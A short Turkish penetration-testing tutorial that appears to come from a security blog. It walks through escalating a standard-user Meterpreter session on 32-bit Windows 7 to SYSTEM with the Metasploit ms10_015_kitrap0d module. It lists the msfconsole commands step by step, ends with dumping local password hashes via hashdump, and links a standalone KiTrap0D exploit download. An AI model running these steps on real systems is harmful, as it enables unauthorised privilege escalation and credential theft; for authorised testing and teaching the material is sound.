MSF ms10_015_kitrap0d İstismar Modülü ile İşletim Sistemindeki Hak Yükseltme Zafiyetinin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

Windows sızma testleri sırasında standart haklar ile erişim sağlanabilmiş bir bilgisayarda, hak yükseltilerek yönetici hakları elde edilmeye çalışılır. Hak yükseltmek için kullanılan yöntemlerden birisi de işletim sistemindeki zafiyetlerin istismar edilmesidir. Bu yazıda, 32 bit mimarideki Windows 7 işletim sistemine sahip bir bilgisayarda, MS10-015 bültenine ait zafiyet MSF ms10_15_kirap0d istismar modülü ile kötüye kullanılacak ve standart bir kullanıcı hesabı ile elde edilmiş Meterpreter bağlantısında hak yükseltilerek SYSTEM hakları ile Meterpreter bağlantısı elde edilecektir.

Standart yetkilerle elde edilen Meterpreter bağlantısında yerel parola özetlerinin elde edilemediği görülmektedir. Bu yetkilere sahip durumda iken, hak yükseltmek için kullanılacak olan MSF ms10_15_kirap0d istismar modülü seçilir.

getuid
hashdump
search ms10_015
use exploit/windows/local/ms10_015_kitrap0d
show options

Modüle, mevcut oturuma ait ID değeri verilir ve modül başlatılarak SYSTEM hakları elde edilir.

set SESSION 1
show options
run
getuid

Modülün SYSTEM hakları ile çalışan “notepad.exe” adlı bir proses oluşturduğu görülmektedir. Hak yükseltme işlemi sonrasında, yerel hesaplara ait bilgilerin elde edilebildiği görülmektedir.

getuid
getpid
ps -S notepad
hashdump

 

Bunun yanında KiTrap0d istismar kodu kullanılarak da hak yükseltilebilirdir.

https://packetstormsecurity.com/files/download/85449/KiTrap0D.zip

 

Kaynak:

http://blogagencysecurity.blogspot.com.tr/2011/11/old-privilege-escalation-techniques.html